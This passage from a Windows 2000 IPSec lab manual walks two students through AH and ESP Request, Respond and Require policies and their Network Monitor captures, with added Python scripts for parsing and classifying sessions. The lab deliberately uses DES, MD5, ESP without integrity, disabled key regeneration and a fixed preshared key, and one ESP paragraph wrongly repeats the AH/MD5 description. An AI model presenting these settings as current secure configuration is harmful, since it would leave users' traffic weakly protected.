TASK 2C-9 Configuring a Request-and-Respond IPSec Session

Note: Perform step 1 only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy, and choose Assign. Close the ipsec.mmc.msc console, without saving changes.

Then, wait until Student_Q performs the next step.

Note: Perform step 2 only if you are designated as Student_Q.

2. Activate Network Monitor, and start a capture.

Note: Perform the rest of this task only if you are designated as Student_P.

For this step, and subsequent steps that deal with the ISAKMP protocol, your classroom configuration might not yield the expected results, due to timing issues as the students complete their assigned steps. You can have them try to restart the computer, and then try redoing the activity.


3. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.

4. Log on as anonymous with no password.

5. Enter dir to see a list of files hosted on the ftp site.

6. Exit the ftp session.

7. Close the command prompt.

Request-and-Respond Session Analysis

In the second attempt at communication, the temporary delay that was visible in the earlier task was not present. This is due to the fact that the second host was now able to respond to the IPSec request initiated by the ftp server. There was no need to move down the list to a different method of communication, thus saving a bit of time. In the following task, you will use Network Monitor to analyze this session, and to see how the IPSec policy was implemented.

Some things to look for during this analysis include:

• IP identifies AH with a protocol ID of 0x33 (51).

• AH identifies TCP with a Next Header of 0x6 (6).

• TCP identifies FTP with a destination port of 0x15 (21).

TASK 2C-10 Analyzing the Request-and-Respond Session

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. In Network Monitor, stop and view the capture.

2. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).

3. Observe that, because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) by using the ISAKMP protocol (UDP port 500).

4. Observe that, when Student_P agrees to comply with the IPSec request (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.

5. Observe that the actual three-way handshake is now completed in frames 14 and 15.

6. Observe that, from frame 16 onward until the session teardown, the AH ensures integrity of communication between the two machines.


7. Double-click a frame whose protocol is identified by Network Monitor as FTP.

8. Observe the sequence of protocol identification: Ethernet, then IP, then AH, then TCP, then FTP. As noted earlier:

• Ethernet identifies the protocol IP with an Ethertype of 0x800.

• IP identifies AH with a protocol ID of 0x33 (51).

• AH identifies TCP with a Next Header of 0x6 (6).

• TCP identifies FTP with a destination port of 0x15 (21).

9. Observe that there is no encryption—the AH only signs the packet; it does not encrypt it.

10. In fact, look around frame 33. Near there, you should be able to see the name of the text file in response to the dir (LIST) command.

11. Close Network Monitor. You can save your capture to a file if you like.
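The header chain observed in step 8 can be walked programmatically. The Python script below is an added example, not code from the course, that parses a constructed Ethernet frame and reports the same identification sequence: Ethertype 0x800, IP protocol 51 (AH), Next Header 6 (TCP), port 21 (FTP), and shows that the FTP text inside an AH-signed packet is readable because AH signs but does not encrypt. It also goes one step beyond the page by recognizing ESP, whose IP protocol number, 50, is taken from the ESP RFC rather than from the course: once the walker has read ESP's SPI and sequence number, only ciphertext remains, which is the difference the ESP comparison in Topic 2D turns on. The MAC and IP addresses, SPIs, ciphertext bytes, and the zeroed 96-bit ICV are all constructed sample values.

```python
"""Walk the header chain of a captured Ethernet frame the way the Network
Monitor detail pane does: Ethernet -> IP -> AH or ESP -> TCP -> FTP.
Added example; not course material.  All frames below are constructed."""
import struct

ETHERTYPE_IPV4 = 0x0800   # Ethernet identifies IP
IPPROTO_TCP = 6           # AH Next Header (or IP protocol) identifies TCP
IPPROTO_ESP = 50          # assumption from the ESP RFC; not quoted on the page
IPPROTO_AH = 51           # 0x33, as the course notes
FTP_PORT = 21             # 0x15


def parse_frame(frame: bytes) -> dict:
    """Return the protocol chain plus the field that identified each hop."""
    if len(frame) < 34:                      # Ethernet (14) + minimal IPv4 (20)
        raise ValueError("truncated frame")
    result = {"chain": ["Ethernet"],
              "ethertype": struct.unpack("!H", frame[12:14])[0]}
    if result["ethertype"] != ETHERTYPE_IPV4:
        return result
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                 # header length in bytes
    proto = ip[9]
    result["chain"].append("IP")
    result["ip_protocol"] = proto
    payload = ip[ihl:]
    if proto == IPPROTO_AH:
        # AH: next header(1) payload len(1) reserved(2) SPI(4) seq(4) ICV(n)
        next_hdr, pay_len = payload[0], payload[1]
        ah_len = (pay_len + 2) * 4           # field counts 32-bit words minus 2
        spi, seq = struct.unpack("!II", payload[4:12])
        result["chain"].append("AH")
        result.update(ah_next_header=next_hdr, ah_spi=spi, ah_seq=seq,
                      ah_icv_bits=(ah_len - 12) * 8)
        proto, payload = next_hdr, payload[ah_len:]
    elif proto == IPPROTO_ESP:
        # ESP: SPI(4) seq(4) then ciphertext; nothing past seq can be parsed
        spi, seq = struct.unpack("!II", payload[:8])
        result["chain"].append("ESP")
        result.update(esp_spi=spi, esp_seq=seq, esp_opaque_bytes=len(payload) - 8)
        return result
    if proto == IPPROTO_TCP:
        src, dst = struct.unpack("!HH", payload[:4])
        data_off = (payload[12] >> 4) * 4
        result["chain"].append("TCP")
        result.update(tcp_src=src, tcp_dst=dst)
        if FTP_PORT in (src, dst):
            # AH signs but does not encrypt, so the FTP text is readable
            result["chain"].append("FTP")
            result["ftp_text"] = payload[data_off:].decode("ascii", "replace")
    return result


# --- constructed sample frames: Student_Q 10.0.0.11 -> Student_P 10.0.0.12 ---
def _ethernet_ipv4(proto: int, payload: bytes) -> bytes:
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0,
                     64, proto, 0, bytes([10, 0, 0, 11]), bytes([10, 0, 0, 12]))
    return bytes(6) + bytes(6) + struct.pack("!H", ETHERTYPE_IPV4) + ip + payload


def sample_ah_ftp_frame() -> bytes:
    """FTP banner from port 21 inside AH with a 96-bit HMAC-MD5 ICV (zeroed here)."""
    tcp = struct.pack("!HHIIBBHHH", FTP_PORT, 1050, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    tcp += b"220 Student_Q FTP ready\r\n"
    ah = struct.pack("!BBHII", IPPROTO_TCP, 4, 0, 0x1A2B3C4D, 1) + bytes(12)
    return _ethernet_ipv4(IPPROTO_AH, ah + tcp)


def sample_esp_frame() -> bytes:
    """Same banner under ESP: after SPI and sequence only ciphertext is visible."""
    ciphertext = bytes.fromhex("9f3a7c41e2d08b6a55f1c9e3a0b27d4c")   # constructed
    return _ethernet_ipv4(IPPROTO_ESP, struct.pack("!II", 0x5E5E5E5E, 1) + ciphertext)


if __name__ == "__main__":
    for name, frame in (("AH", sample_ah_ftp_frame()), ("ESP", sample_esp_frame())):
        print(name, parse_frame(frame))
```

Running it prints the AH frame's chain as Ethernet, IP, AH, TCP, FTP with the banner text recovered, and the ESP frame's chain stopping at ESP with 16 opaque bytes; that visible-versus-opaque contrast is what to look for when the same walkthrough is repeated with the ESP policies.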

Implementing a Require IPSec Policy

Now let’s modify the situation a bit. You will configure Student_Q to demand IPSec of other computers. You will use the Require policy instead of the Request policy. From Student_P, you will attempt to communicate with Student_Q and fail. Then you will reassign the Respond policy on Student_P so that you will be able to re-establish communications with Student_Q.

TASK 2C-11 Implementing the 2_REQUIRE_AH(md5)_only Policy

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy, and choose Un-assign. Then close the ipsec.mmc.msc console.

Note: Perform the rest of this task only if you are designated as Student_Q.

2. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_AH(md5)_only policy, and choose Un-assign.

3. In the right pane, right-click and choose Create IP Security Policy, then click Next.

4. For the IP Security Policy Name, enter 2_REQUIRE_AH(md5)_only, and click Next.

5. Uncheck Activate The Default Response Rule, and click Next.

6. Uncheck Edit Properties, and click Finish.


7. Double-click the new policy.

8. On the Rules tab, uncheck Use Add Wizard if it’s checked, and click Add.

9. On the IP Filter List tab, click the radio button for All IP Traffic.

10. Switch to the Filter Action tab.

11. Click the radio button for Require Security.

12. Click the Edit button.

13. Leave the radio button selected for Negotiate Security.

14. Remove all but one method by holding down the Shift key, selecting all but one of the choices, and clicking Remove.

15. When prompted with Are You Sure?, click Yes.

16. Select the remaining method, and click Edit.

17. Under Security Method, click the Settings button found under Custom (For Expert Users).

18. Verify that AH is checked and that the integrity algorithm is MD5.

19. Verify that ESP is unchecked.

20. Under the Session Key settings, uncheck the two boxes for generating new keys for time and size.

21. Click OK. If you see an information box indicating that you are on a Medium security level, click OK to agree to it.

22. Click OK twice.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

26. Click OK to close the Edit Authentication Method Properties dialog box.

27. Click Close twice to close the Rule Properties.

Mismatched AH Implementation

You have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will respond only by using this algorithm. Let’s see what happens when Student_P does not follow Student_Q’s lead.


TASK 2C-12 Attempting to Use Different IPSec Policies

Note: Perform step 1 through step 3 only if you are designated as Student_Q.

1. In your ipsec.mmc.msc console, right-click the 2_REQUIRE_AH(md5)_only policy and choose Assign.

2. Activate Network Monitor, and make sure that it is going to collect packets from the interface connected to Student_P. This is the Partner interface.

3. Allow Network Monitor to capture packets until Student_P has finished the rest of the task.

Note: Perform the rest of this task only if you are designated as Student_P.

4. At a command prompt, again enter ftp IP_address_of_Student_Q.

5. After a substantial delay, observe that you cannot ftp to Student_Q. In fact, you should receive a message indicating that the connection has timed out.

6. Enter quit to stop the ftp attempt.

Mismatched IPSec Session Analysis

Why was your attempt unsuccessful? What is the reason for the substantial delay? This is because Student_Q’s policy is designed to demand IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will not fall back to regular, insecure IP. The substantial delay occurred because Student_Q was trying to establish an IPSec communication with Student_P.

TASK 2C-13 Analyzing a Mismatched IPSec Policy Session

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. In Network Monitor, stop and view the capture.

2. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).


3. Observe that, because the policy on Student_Q says to require IPSec communication, Student_Q begins the negotiation process (in frame 4) with the ISAKMP protocol. When it does not hear from Student_P, approximately a second later, it tries again. Student_P, meanwhile, keeps knocking on Student_Q’s door with a SYN packet, as it has no idea how to respond to the ISAKMP exchange. Student_Q keeps plugging away with ISAKMP because its policy will allow it to proceed only after ISAKMP negotiations have been successful.

4. Close Network Monitor. You can save your capture to a file if you like.
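The three capture shapes analyzed in Tasks 2C-8, 2C-10 and 2C-13 (a Request policy falling back to clear text, a request answered and then protected by AH, and a Require policy that leaves Student_P retrying its SYN with no handshake) can be told apart mechanically, which is useful when checking that a host that is supposed to require IPSec never silently falls back. The Python below is an added example, not course material: it classifies a list of Network Monitor-style frame summaries, counts the server's unanswered ISAKMP tries and the client's SYN retries, records the frame in which the handshake completed, and reports whether the FTP payload is readable. The three captures are constructed here to mirror the three tasks (their frame numbers approximate the course's), and the Frame class and its field names are this example's own.

```python
"""Classify a captured session the way the course's Network Monitor
walkthroughs do: did Student_Q try ISAKMP, did Student_P answer, did the
traffic fall back to clear text, or did a Require policy block it?
Added example; not course material.  The captures below are constructed."""
from dataclasses import dataclass


@dataclass
class Frame:
    num: int
    src: str
    dst: str
    proto: str       # "ARP", "ISAKMP", "TCP", "FTP" (as the summary pane labels it)
    flags: str = ""  # TCP flags: "S" SYN, "SA" SYN/ACK, "A" ACK, "PA" data
    ipsec: str = ""  # "AH" or "ESP" when an IPSec header carries the packet


def classify_session(frames, server="Student_Q", client="Student_P") -> dict:
    """Summarize one capture of client -> server FTP traffic."""
    isakmp_cli = [f for f in frames if f.proto == "ISAKMP" and f.src == client]
    first_reply = isakmp_cli[0].num if isakmp_cli else None
    # ISAKMP sent by the server before the client ever answered (if it did)
    tries = [f for f in frames if f.proto == "ISAKMP" and f.src == server
             and (first_reply is None or f.num < first_reply)]
    syns = [f for f in frames if f.proto == "TCP" and f.flags == "S" and f.src == client]
    syn_acks = [f for f in frames if f.proto == "TCP" and f.flags == "SA" and f.src == server]
    protected = {f.ipsec for f in frames if f.proto in ("TCP", "FTP") and f.ipsec}
    if isakmp_cli and syn_acks:
        outcome = "ipsec"        # negotiation answered, handshake completed under IPSec
    elif tries and syn_acks:
        outcome = "fallback"     # Request policy: peer silent, clear text accepted
    elif tries:
        outcome = "blocked"      # Require policy: peer silent, no handshake at all
    elif syn_acks:
        outcome = "cleartext"    # no IPSec policy in force on the server
    else:
        outcome = "no_handshake"
    return {
        "outcome": outcome,
        "isakmp_tries": len(tries),
        "client_syn_retries": max(len(syns) - 1, 0),
        "handshake_frame": syn_acks[0].num if syn_acks else None,
        "ipsec": ",".join(sorted(protected)) or None,
        # AH signs but does not encrypt, so only ESP hides the FTP payload
        "payload_visible": any(f.proto == "FTP" and f.ipsec != "ESP" for f in frames),
    }


# --- constructed captures mirroring Tasks 2C-8, 2C-10 and 2C-13 ---
def _f(num, src, dst, proto, flags="", ipsec=""):
    return Frame(num, src, dst, proto, flags, ipsec)


Q, P = "Student_Q", "Student_P"
ARP = [_f(1, P, Q, "ARP"), _f(2, Q, P, "ARP")]

# Request policy on Q only: two ISAKMP tries, then the clear-text handshake
REQUEST_ONLY = ARP + [
    _f(3, P, Q, "TCP", "S"), _f(4, Q, P, "ISAKMP"), _f(5, Q, P, "ISAKMP"),
    _f(6, P, Q, "TCP", "S"), _f(7, Q, P, "TCP", "SA"), _f(8, P, Q, "TCP", "A"),
    _f(9, Q, P, "FTP", "PA")]

# P answers ISAKMP in frame 5; handshake and FTP then ride inside AH
REQUEST_AND_RESPOND = ARP + [_f(3, P, Q, "TCP", "S")] + [
    _f(n, Q if n % 2 == 0 else P, P if n % 2 == 0 else Q, "ISAKMP")
    for n in range(4, 14)] + [
    _f(14, Q, P, "TCP", "SA", "AH"), _f(15, P, Q, "TCP", "A", "AH"),
    _f(16, Q, P, "FTP", "PA", "AH")]

# Require policy on Q, no policy on P: ISAKMP and SYN retries, no SYN/ACK ever
MISMATCH = ARP + [
    _f(3, P, Q, "TCP", "S"), _f(4, Q, P, "ISAKMP"), _f(5, Q, P, "ISAKMP"),
    _f(6, P, Q, "TCP", "S"), _f(7, Q, P, "ISAKMP"), _f(8, P, Q, "TCP", "S"),
    _f(9, Q, P, "ISAKMP"), _f(10, P, Q, "TCP", "S")]


if __name__ == "__main__":
    for name, cap in (("request-only", REQUEST_ONLY),
                      ("request-and-respond", REQUEST_AND_RESPOND),
                      ("mismatch", MISMATCH)):
        print(name, classify_session(cap))
```

The "fallback" outcome is the one worth alerting on in a production capture: it means a host that was meant to negotiate IPSec accepted a clear-text session instead, exactly what the Request policy permits and the Require policy forbids.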

Implementing and Analyzing the Require Response Policy

Clearly, in order for Student_P to communicate, it must use an appropriate IPSec policy. Now, you will configure Student_P to respond to Student_Q’s IPSec policy. Once you have enabled the policy, you will capture and analyze the IPSec traffic in Network Monitor.

TASK 2C-14 Implementing and Analyzing a Require IPSec Policy Session

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy and choose Assign. Then close the ipsec.mmc.msc console.

Note: Perform the following step only if you are designated as Student_Q.

2. Start Network Monitor, and start a capture as soon as Student_P enables the IPSec policy, but before Student_P attempts to ftp.

Note: Perform step 3 through step 6 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q.

4. Log on as anonymous with no password. You should be able to successfully ftp to Student_Q.

5. Enter dir to see a list of files hosted on the ftp site.

6. Exit the ftp session, and close the command prompt.

Note: Perform the rest of this task only if you are designated as Student_Q.

7. In Network Monitor, stop and view the capture.


8. Observe that these captures are exactly the same as when the 1_REQUEST_AH(md5)_only policy was in force earlier in this topic. There is no difference with respect to the negotiation process, there is no difference with respect to the three-way handshake, and so forth.

9. Close Network Monitor. You can save your capture to a file if you like.

Topic 2D IPSec ESP Implementation

In the previous topic, you examined the AH implementation in Windows 2000. You implemented the different types of AH, and analyzed the communication in Network Monitor. In this topic, you will see how to configure a computer to use the encryption provided with ESP, and compare the implementation options of this form of IPSec to the AH implementations.

Implementing a Request ESP IPSec Policy

Let’s start our investigation of ESP encryption by creating a Request policy. The tools and the basic procedure are the same as you used to implement AH Request policies; just some of the options you select will be slightly different.

TASK 2D-1 Creating the 3_REQUEST_ESP(des)_only IPSec Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. If necessary, open your ipsec.mmc.msc console. In the right pane, right-click and choose Create IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 3_REQUEST_ESP(des)_only, and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.

7. On the IP Filter List tab, click the radio button for All IP Traffic.

8. Switch to the Filter Action tab.

9. Click the radio button for Request Security (Optional).


10. Click Edit.

11. Leave the radio button selected for Negotiate Security.

12. Read the options presented to you under Security Method Preference Order.

13. Remove all but one security method by holding the Shift key, selecting all but one of the choices, and clicking Remove. There might be only one option in some cases, based on your current OS configuration. If so, skip the next step.

14. When prompted with Are You Sure?, click Yes.

15. Select the remaining method, and click Edit.

16. Under Security Method, click the Settings button found under Custom (For Expert Users).

17. Verify that AH is unchecked.

18. Verify that ESP is checked.

19. Leave ESP’s integrity algorithm set to <None>.

20. For Encryption Algorithm, select DES.

21. Under the Session Key settings, verify that the boxes for generating new keys for both time and size are unchecked.

22. Click OK three times to return to the New Rule Properties.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

26. Click OK, and then click Close to return to the Policy Properties.

27. On the Rules tab, check <Dynamic> Default Response, and verify that the Use Add Wizard check box is unchecked. Click Edit.

28. Under Security Methods, remove all but one of the methods.

29. When prompted with Are You Sure?, click Yes.

30. Select the remaining method, and click Edit.

31. Under Security Method, click the Settings button found under Custom (For Expert Users).

32. Verify that AH is unchecked.

33. Verify that ESP is checked.


34. Verify that ESP’s integrity algorithm is set to <None>.

35. For ESP’s encryption, select DES.

36. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

37. Click OK twice to return to the Rule Properties.

38. Switch to the Authentication Methods tab.

39. Click Edit.

40. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

41. Click OK twice, and then click Close to exit from the Policy Properties.

42. Close the ipsec.mmc.msc, without saving settings.

Configuring the ESP IPSec Response

You have configured a policy wherein Student_Q will request other computers that attempt to communicate with it to implement ESP by using the DES encryption algorithm; Student_Q is also in a position to respond by using this algorithm. If communication were attempted at this point, the two hosts would not be able to send data to one another. The second host, Student_P in this case, must be configured to communicate using ESP as well.

During the creation of this policy, you will see five columns presented as Security Methods: Type, AH Integrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec). Because you will have named this policy 3_RESPOND_ESP(des)_only, you’ll simplify the list and offer exactly one choice, as you did in the other rules. In this case, you are creating a rule so that the host will respond to requests for IP Security that rely only on ESP confidentiality by using the DES encryption algorithm.

TASK 2D-2 Creating the 3_RESPOND_ESP(des)_only IPSec Policy

Note: Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the 1_RESPOND_AH(md5)_only policy. Create another IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 3_RESPOND_ESP(des)_only, and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.


4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit.

7. Remove all but one Security Method by holding the Shift key, selecting all but one of the choices, and clicking Remove.

8. When prompted with Are You Sure?, click Yes.

9. Select the remaining method, and click Edit.

10. Under Security Method, click the Settings button found under Custom (For Expert Users).

11. Verify that AH is unchecked.

12. Verify that ESP is checked.

13. Verify that ESP’s integrity algorithm is set to <None>.

14. For Encryption Algorithm, select DES.

15. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

16. Click OK twice to return to the Rule Properties.

17. Switch to the Authentication Methods tab.

18. Click Edit.

19. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

20. Click OK twice, and then click Close to end the creation of the policy.

21. Close the ipsec.mmc.msc without saving settings.

ESP Request-and-Response Session Analysis

Now that you have two hosts each configured with an ESP IPSec policy, you will enable those policies. You will then initiate network traffic, and analyze the traffic in Network Monitor. During the analysis stage, keep in mind the differences you see between the ESP implementation and what you saw in the AH implementation.


The first task will walk through the steps of using IPSec with ESP on one host, and not the other. As with the 1_REQUEST_AH(md5)_only policy, this transaction is also successful between Student_P and Student_Q because Student_Q’s policy is designed to request only—not demand—IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. As you saw before, the brief delay occurs because Student_Q is trying to establish an IPSec communication with Student_P.

TASK 2D-3 Enabling IPSec ESP Policies

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ESP(des)_only policy and choose Assign. Assigning this policy automatically unassigns the policy that was in effect.

2. Start Network Monitor, make sure that it is going to collect packets from the interface connected to Student_P, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. At a command prompt, again enter ftp IP_address_of_Student_Q.

4. Observe that you can successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.

5. Log on as anonymous with no password.

6. Enter dir to see a list of files hosted on the ftp site.

7. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.

9. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). Because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4).

10. Observe that in frame 4, the protocol is ISAKMP (UDP port 500). Whenit does not hear from Student_P, it tries again approximately a second later.When it does not hear from Student_P again, it falls back to insecure com-munication, and the three-way handshake proceeds as before (in frames 6, 7,and 8).

11. Close Network Monitor. You can save your capture to a file if you like.


Implementing an ESP IPSec Session

As you saw, with the mismatched IPSec policies as defined, there still is some communication; however it is not secure communication. In the next task, you will enable IPSec on both ends and initiate communication. Then, you will examine the network traffic in Network Monitor to see if, indeed, it is encrypted.

TASK 2D-4
Configuring and Analyzing an ESP IPSec Session

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 5 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.

4. Log on as anonymous with no password.

5. Enter dir to see a list of files hosted on the ftp site, and exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

6. In Network Monitor, stop and view the capture.

7. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).

8. Observe that, because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) using the ISAKMP protocol (UDP port 500).

9. Observe that, when Student_P agrees to comply (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.

10. Observe that the actual three-way handshake is now completed in frames 14 and 15.

11. Close Network Monitor. You can save your capture to a file if you like.


ESP Analysis

In the last task, you looked at the three-way handshake in frames 14 and 15. Are you sure you were looking at the three-way handshake? What do you see here that’s different from the earlier capture (the one resulting from the AH_only policy)? You cannot see any of the TCP flags, connection setup, three-way handshake completion, or data transfer—in fact, nothing but encrypted stuff shows up! The protocol is listed simply as ESP. Nobody but these two endpoints can decrypt packets destined for them. Try to look for the name of the text file in response to the dir (LIST) command.

From frames 14 onward until the session teardown, ESP ensures the confidentiality of communication between the two machines; however, you have no way of knowing anything about the integrity of the packet, apart from those checks and balances built into TCP/IP. You chose neither the AH protocol nor the integrity algorithm of ESP. You chose only ESP for encryption.

Creating a Require ESP IPSec Policy

Again, let’s modify the situation a bit. We’ll configure Student_Q to demand IPSec of other computers. We’ll use the Require policy instead of the Request policy. From Student_P, we’ll attempt to communicate with Student_Q and fail. We’ll then reassign the Respond policy on Student_P and re-establish communications with Student_Q.

TASK 2D-5
Implementing the 4_REQUIRE_ESP(des)_only IPSec Policy

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy, and choose Un-assign.

Note: Perform the rest of this task only if you are designated as Student_Q. Student_P is advised to follow along.

2. Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ESP(des)_only policy, and choose Un-assign.

3. Create another IP Security Policy. Click Next.

4. For the IP Security Policy Name, enter 4_REQUIRE_ESP(des)_only, and click Next.

5. Uncheck Activate The Default Response Rule, and click Next.

6. Uncheck Edit Properties, and click Finish.

7. Double-click the new policy.


8. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.

9. On the IP Filter List tab, click the radio button for All IP Traffic.

10. Switch to the Filter Action tab.

11. Click the radio button for Require Security.

12. Click Edit.

13. Leave the radio button for Negotiate Security selected.

14. Remove all but one method by holding the Shift key, selecting all but one of the choices, and clicking Remove. Some configurations may have only one option. If so, skip the next step.

15. When prompted with Are You Sure?, click Yes.

16. Select the remaining method, and click Edit.

17. Under Security Method, select Custom. Click the Settings button found under Custom (For Expert Users), and make sure that AH is unchecked.

18. Verify that ESP is checked.

19. Leave ESP’s integrity algorithm set to <None>.

20. For Encryption Algorithm, select DES.

21. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

22. Click OK three times to return to the Rule Properties.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

26. Click OK, and click Close twice to end the policy modification.

Configuring a Require ESP IPSec Session

You have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will only respond using this algorithm.

The following task covers several situations. First, there will be a mismatch between the two hosts, as Student_P and Q are using different forms of IPSec. Then, both hosts will use the same implementation, and the session will be analyzed in Network Monitor.


The mismatch part will not be successful because Student_Q’s policy is designed to demand IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will not fall back to regular, insecure IP. As you saw before, a substantial delay will occur because Student_Q is trying to establish an IPSec communication with Student_P.

Finally, once ESP is used on both ends of the communication, you will see that there is no difference with respect to the negotiation process—there is no difference with respect to the encryption of all subsequent information, and so forth.

Once ISAKMP establishes the encryption algorithms between the two machines, as far as an eavesdropper is concerned, there will be nothing but binary garbage beyond the IP header.
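The two outcomes just described are worth being able to spot automatically in a capture: a Request policy (Task 2D-3) silently falls back to cleartext when the peer never answers ISAKMP, while a Require policy refuses to fall back and the connection times out. The Python script below is an added example, not part of the course materials or of Network Monitor. It classifies a connection attempt from a constructed, simplified frame summary (addresses 10.0.0.1 and 10.0.0.2 standing in for Student_P and Student_Q; frame sequences modelled on the ones the text describes) as IPsec-negotiated, fallen back to cleartext, or blocked.

```python
"""Classify a TCP connection attempt seen in a capture summary as IPsec-negotiated,
silently downgraded to cleartext, or blocked by a Require policy.

Added example: the Frame records below are a constructed, simplified stand-in for
Network Monitor's frame summary (number, source, destination, protocol, info).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    num: int
    src: str
    dst: str
    proto: str  # "ARP", "TCP", "ISAKMP" (UDP port 500) or "ESP"
    info: str   # TCP flags ("S", "SA", "A", "PA") or a short description


def classify(frames, initiator, responder):
    """Classify the attempt by `initiator` to reach `responder`.

    Returns one of:
      "cleartext"          no ISAKMP at all; TCP handshake in the clear
      "cleartext-fallback" responder offered ISAKMP, initiator never answered,
                           and the TCP handshake then completed in the clear
                           (what a Request policy does with a non-IPsec peer)
      "ipsec-negotiated"   ISAKMP exchange completed; traffic continued as ESP
      "blocked"            responder offered ISAKMP, got no answer and never
                           fell back (Require policy): the connection times out
    """
    offers = replies = 0
    saw_esp = clear_synack = clear_ack = False
    for f in frames:
        if {f.src, f.dst} != {initiator, responder}:
            continue  # traffic between other hosts is not part of this attempt
        if f.proto == "ISAKMP":
            if f.src == responder:
                offers += 1
            else:
                replies += 1
        elif f.proto == "ESP":
            saw_esp = True
        elif f.proto == "TCP":
            if f.src == responder and f.info == "SA":
                clear_synack = True
            elif f.src == initiator and f.info == "A" and clear_synack:
                clear_ack = True
    if saw_esp and replies:
        return "ipsec-negotiated"
    if clear_synack and clear_ack:
        return "cleartext-fallback" if offers else "cleartext"
    if offers and not replies:
        return "blocked"
    return "unknown"


# Constructed addresses standing in for Student_P (initiator) and Student_Q (responder).
P, Q = "10.0.0.1", "10.0.0.2"

# Task 2D-3 as the text describes it: Q requests IPsec, P has no policy, Q retries
# ISAKMP once and then falls back; the handshake completes in the clear.
CAPTURE_REQUEST_FALLBACK = [
    Frame(1, P, Q, "ARP", "request"), Frame(2, Q, P, "ARP", "reply"),
    Frame(3, P, Q, "TCP", "S"),
    Frame(4, Q, P, "ISAKMP", "main mode 1"),
    Frame(5, Q, P, "ISAKMP", "main mode 1 (retry)"),
    Frame(6, P, Q, "TCP", "S"), Frame(7, Q, P, "TCP", "SA"), Frame(8, P, Q, "TCP", "A"),
]

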